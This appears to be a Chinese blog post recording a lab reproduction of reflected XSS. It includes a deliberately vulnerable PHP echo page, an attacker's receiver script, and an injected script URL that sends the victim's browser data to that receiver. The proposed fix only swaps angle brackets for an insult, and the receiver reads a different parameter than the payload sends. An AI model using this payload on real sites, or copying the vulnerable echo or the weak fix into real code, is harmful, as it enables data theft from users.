zoukankan      html  css  js  c++  java
  • 反射型 XSS 原理复现

    反射型 XSS 复现记录


    整个漏洞含有三个实体:

    • 攻击者
    • 受害者
    • 网页服务器:http://192.168.64.2/index.php

    制作漏洞

    网页服务器代码:

    <?php 
        echo $_GET['xss'];
    ?>
    

    利用漏洞

    攻击者漏洞利用流程:

    • 构造含有 XSS 代码的 URL
    • 受害者执行 URL
    • XSS 代码在受害者浏览器上执行,获取信息
    • XSS 代码将获取的信息发送给攻击者

    攻击者接收 XSS 代码传来的信息:http://192.168.64.2/hack.php

    <?php
    	$file = fopen('信息.txt','w');
    	fwrite($file,$_GET['info']);
    ?>
    

    攻击者构建的 URL :

    http://192.168.64.2/?xss=
    <script> window.location.href='http://192.168.64.2/hack.php?hack=' %2B navigator.platform </script>
    

    受害者访问 URL 之后,信息.txt 的内容

    MacIntel
    

    修复漏洞

    网页服务器代码:

    <?php
        $safe1 = str_replace('>','臭不要脸,黑老子站',$_GET['xss']);
        $safe = str_replace('<','臭不要脸,黑老子站',$safe1);
        echo $safe;
    ?>
    
  • 相关阅读:
    磁盘冗余 ---RAID磁盘管理
    linux磁盘管理
    linux基础命令
    Apache配置rewrite
    memcache运维整理
    mysql主从配置
    rsync相关整理
    Lua 学习笔记(六)
    Lua 学习笔记(五)
    Lua 学习笔记(四)
  • 原文地址:https://www.cnblogs.com/shiwai/p/14183649.html
Copyright © 2011-2022 走看看